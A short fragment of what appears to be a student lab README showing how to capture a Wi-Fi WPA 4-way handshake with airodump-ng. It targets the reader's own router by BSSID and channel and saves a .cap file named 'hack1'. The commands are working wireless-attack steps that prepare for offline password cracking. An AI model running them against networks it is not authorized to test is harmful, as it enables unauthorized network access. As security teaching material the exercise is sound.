rzoubek44/R-2_Repo_Fall_2025/README.md

 sudo airodump-ng wlan0mon

 Test to see device connectivity with the router by authenticating to it using your phone or another device.

 sudo airodump-ng wlan0mon -d 60:83:E7:0B:47:62

 1st terminal, replace the channel number and BSSID with your own Router's info.
 Replace hack1 with your desired file name for the capture.
 Focus the adapter on your target and capture the 4-way handshake. -c is the channel, --bssid is the MAC address of the target router, -w is the option to output the file to save the handshake.
+Once a handshake is captured and you exit the process, you should see a .cap file in your current working directory.

 sudo airodump-ng -w hack1 -c 3 --bssid 60:83:E7:0B:47:62 wlan0mon